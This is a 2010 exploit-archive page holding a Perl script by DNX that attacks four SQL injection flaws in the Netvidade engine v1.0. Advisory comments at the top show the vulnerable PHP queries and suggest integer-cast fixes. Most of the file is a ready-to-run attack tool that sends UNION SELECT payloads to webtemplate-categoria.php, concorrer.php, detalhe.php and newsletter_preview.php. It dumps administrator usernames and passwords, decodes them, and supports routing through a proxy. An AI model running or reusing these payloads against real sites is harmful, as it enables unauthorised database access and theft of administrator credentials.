Netvidade engine v1.0 Multiple Vulnerabilities
来源:Inj3ct0r.com 作者:DNX 发布时间:2010-05-11  
==============================================
Netvidade engine v1.0 Multiple Vulnerabilities
==============================================

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use Getopt::Long;
use MIME::Base64;

#                               \#'#/
#                               (-.-)
#    ----------------------oOO---(_)---OOo----------------------
#    |               __             __                         |
#    |         _____/ /_____ ______/ /_  __  ______ ______     |
#    |        / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/     |
#    |       (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )      |
#    |      /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/       |
#    |      Security Research Division      /____/ 2o1o        |
#    -----------------------------------------------------------
#    |     Netvidade engine v1.0 Multiple Vulnerabilities      |
#    -----------------------------------------------------------
# [!] Discovered by.: pwndomina
# [!] Vendor........: http://www.netvidade.com
# [!] Detected......: 15.04.2010
# [!] Reported......: 06.05.2010
# [!] Response......: xx.xx.2010 (no vendor response had been received when this was published)
#
# [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6
#
#                     3: if ($_GET['id']==0)
#                     4:         $lista_webtemp=$netvidade->lista_webtemp();
#                     5: else
#                     6:         $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']);
#
#                     The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212
#
#                     212: function lista_webtemp_categoria($id)
#                     213: {
#                     214: $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=$id";
#                     215: $a=$this->CORE->db();
#                     216: $res=$a->abrecursor($query);
#                     217: return $res;
#                     218: }
#
# [!] Bug...........: $_GET['id'] in concorrer.php near line 2
#
#                     2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']);
#
#                     The function lista_proposta() is in class/var/recrutamento.class.php near line 42
#
#                     42: function lista_proposta($id)
#                     43: {
#                     44: $query="select * from recrutamento_propostas where id=$id";
#                     45: $a=$this->CORE->db();
#                     46: $res=$a->abrecursor($query);
#                     47: return $res;
#                     48: }
#
# [!] Bug...........: $_GET[id] in detalhe.php near line 6
#
#                     6: $noticias=$a->lista_noticia_detalhe($_GET[id]);
#
#                     The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208
#
#                     208: function lista_noticia_detalhe($id)
#                     209: {
#                     210: $query="
#                     211: select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome
#                     212: from noticias a, noticias_categorias b, administradores c
#                     213: where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#                     214: ";
#                     215:
#                     216: $a=$this->CORE->db();
#                     217: $res=$a->abrecursor($query);
#                     218: return $res;
#                     219: }
#
# [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6
#
#                     6: $dados=$a->lista_newsletter($_GET[id]);
#
#                     The function lista_newsletter() is in class/var/newsletter.class.php near line 113
#
#                     113: function lista_newsletter($id)
#                     114: {
#                     115: $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=$id";
#                     116: $a=$this->CORE->db();
#                     117: $res=$a->abrecursor($query);
#                     118: return $res;
#                     119: }
#
# [!] Quick fix.....: in class/var/netvidade.class.php line 214
#                     (The (int) casts below are adequate only because every affected query compares $id as a number;
#                     they are a stop-gap. Binding the id as a prepared-statement parameter is the durable fix.)
#
#                     - replace:
#                         $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=$id";
#
#                     - with:
#                         $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=".(int)$id;
#
# [!] Quick fix.....: in class/var/recrutamento.class.php line 44
#
#                     - replace:
#                         $query="select * from recrutamento_propostas where id=$id";
#
#                     - with:
#                         $query="select * from recrutamento_propostas where id=".(int)$id;
#
# [!] Quick fix.....: in class/var/noticias.class.php line 213
#
#                     - replace:
#                         where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
#                     - with:
#                         where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# [!] Quick fix.....: in class/var/newsletter.class.php line 115
#
#                     - replace:
#                         $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=$id";
#
#                     - with:
#                         $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=".(int)$id;
#
# [!] Greetings.....: cih.ms and phact.in
#

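# ---------------------------------------------------------------------------
# Command-line handling and dispatch.
#
# Options are parsed before the usage check so that the check looks at what
# was actually supplied instead of at a raw @ARGV position.  The original
# `!$ARGV[3]` test let e.g. `host /path/ -p 1.2.3.4:8080` (four words, no -t)
# through, after which nothing ran but "Exploiting..." and "Exploit done" were
# still printed; an unknown or missing -t behaved the same way and, under -w,
# produced "uninitialized value" warnings from the `== 1` comparisons.
# The usage text is reproduced unchanged.
# ---------------------------------------------------------------------------
my %options   = ();
my $parsed_ok = GetOptions(\%options, "t=i", "u=i", "p=s");

# Target number -> routine.  The subs live further down the file; taking a
# reference to them here is fine because the whole file is compiled before
# this statement runs.
my %exploit_for = (
  1 => \&exploit1,   # webtemplate-categoria.php
  2 => \&exploit2,   # concorrer.php
  3 => \&exploit3,   # detalhe.php
  4 => \&exploit4,   # newsletter_preview.php
);

my $target_ok = defined $options{"t"} && exists $exploit_for{$options{"t"}};

# Host, path and a known target are all mandatory.
if(!$parsed_ok || @ARGV < 2 || !$target_ok)
{
  print "\n                             \\#'#/                          ";
  print "\n                             (-.-)                           ";
  print "\n   ---------------------oOO---(_)---OOo----------------------";
  print "\n   | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |";
  print "\n   |                discovered by pwndomina                 |";
  print "\n   |                     coded by DNX                       |";
  print "\n   ----------------------------------------------------------";
  print "\n[!] Usage: perl netvidade.pl [Host] [Path] [Target] <Options>";
  print "\n[!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1";
  print "\n[!] Targets:";
  print "\n       -t 1            webtemplate-categoria.php";
  print "\n       -t 2            concorrer.php";
  print "\n       -t 3            detalhe.php";
  print "\n       -t 4            newsletter_preview.php";
  print "\n[!] Options:";
  print "\n       -u [no]         User-Id";
  print "\n       -p [ip:port]    Proxy support";
  print "\n[!] Notes:";
  print "\n                       For the targets 2, 3 & 4 you can use -u option.";
  print "\n";
  exit;
}

# File-scope lexicals: the exploitN() subs below close over these, so they
# must stay declared here, ahead of the sub definitions.
my $ua     = LWP::UserAgent->new();
my $host   = $ARGV[0];
my $path   = $ARGV[1];
my $userid = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }

# -u narrows the UNION to a single administradores row.  Only exploit2/3/4
# append it; exploit1 ignores it (see the usage notes).
if($options{"u"}) { $userid = "+where+id=".$options{"u"}; }

print "[!] Exploiting...\n\n";

$exploit_for{$options{"t"}}->();

print "\n[!] Exploit done\n";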

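# Target 1: webtemplate-categoria.php?id=
#
# lista_webtemp_categoria() interpolates $id unquoted at the very end of its
# SELECT (advisory header, netvidade.class.php line 214), so a negative id
# followed by a UNION appends one row per administradores entry without any
# comment terminator.  The UNION width (17 columns) was fixed by the author
# to match the original SELECT; the "##user#pass##" marker that check()
# scans for sits in column 3, presumably the one the page echoes.
# -u is not applied to this target (see the usage notes).
sub exploit1
{
  my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores";
  my $res = $ua->get($url);
  # A transport or server error used to be silent: check() found no marker
  # and the script still reported "Exploit done".  Warn, but still scan the
  # body -- an error page can carry the UNION output.
  warn "[!] HTTP ".$res->status_line." for ".$url."\n" unless $res->is_success;
  check($res);
}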

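# Target 2: concorrer.php?id=
#
# lista_proposta() builds "select * from recrutamento_propostas where id=$id"
# (advisory header, recrutamento.class.php line 44); $id is the last token of
# the query, so the UNION plus the optional "+where+id=N" from -u needs no
# comment terminator.  10 UNION columns; the marker is in column 2.
sub exploit2
{
  my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid;
  my $res = $ua->get($url);
  # Previously a failed request was indistinguishable from "no rows found";
  # surface the status but still let check() scan the body.
  warn "[!] HTTP ".$res->status_line." for ".$url."\n" unless $res->is_success;
  check($res);
}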

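# Target 3: detalhe.php?id=
#
# Unlike the other sinks, lista_noticia_detalhe() continues its WHERE clause
# after $id ("and a.autor=c.id and a.data_online <= NOW() ...", advisory
# header, noticias.class.php line 213), so the payload ends with "/*" to
# comment out the remainder.  14 UNION columns; the marker is in column 4.
# The optional -u filter is inserted before the terminator.
sub exploit3
{
  my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*";
  my $res = $ua->get($url);
  # Previously a failed request was indistinguishable from "no rows found";
  # surface the status but still let check() scan the body.
  warn "[!] HTTP ".$res->status_line." for ".$url."\n" unless $res->is_success;
  check($res);
}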

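# Target 4: newsletter_preview.php?id=
#
# lista_newsletter() ends its query with "and a.id=$id" (advisory header,
# newsletter.class.php line 115), so the UNION and the optional -u filter
# are appended without a comment terminator.  6 UNION columns; the marker
# is in column 2.
sub exploit4
{
  my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid;
  my $res = $ua->get($url);
  # Previously a failed request was indistinguishable from "no rows found";
  # surface the status but still let check() scan the body.
  warn "[!] HTTP ".$res->status_line." for ".$url."\n" unless $res->is_success;
  check($res);
}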

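# Scan a response body for the "##username#password##" markers planted by the
# UNION payloads (concat(0x23,0x23,username,0x23,password,0x23,0x23)) and
# print one "user:password" line per hit.
#
# Argument: an object with a content() method (the HTTP::Response from
# $ua->get).  Returns the number of credentials printed; the original
# returned nothing useful, so callers that ignore the value are unaffected.
#
# Changes from the original:
#   * the body is scanned with one global match instead of line by line, so
#     several rows rendered on a single line are all reported (the per-line
#     version stopped at the first marker on each line);
#   * an undefined or empty body is tolerated.
#
# NOTE(review): the password column is run through decode_base64() on the
# assumption that the application stores passwords base64-encoded.  Nothing
# in the advisory establishes that; decode_base64() silently drops characters
# outside its alphabet, so a hex digest would come out as binary noise.  If
# the output looks garbled, print $pass raw instead.
sub check
{
  my $res = shift;
  my $content = $res->content;
  my $found = 0;
  return $found unless defined $content && length $content;

  # Non-greedy so a marker pair closes at the first "##" that follows it;
  # a username containing '#' would still confuse this.
  while ($content =~ /##(.*?)#(.*?)##/g)
  {
    my ($user, $pass) = ($1, $2);
    print $user.":".decode_base64($pass)."\n";
    $found++;
  }
  return $found;
}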


 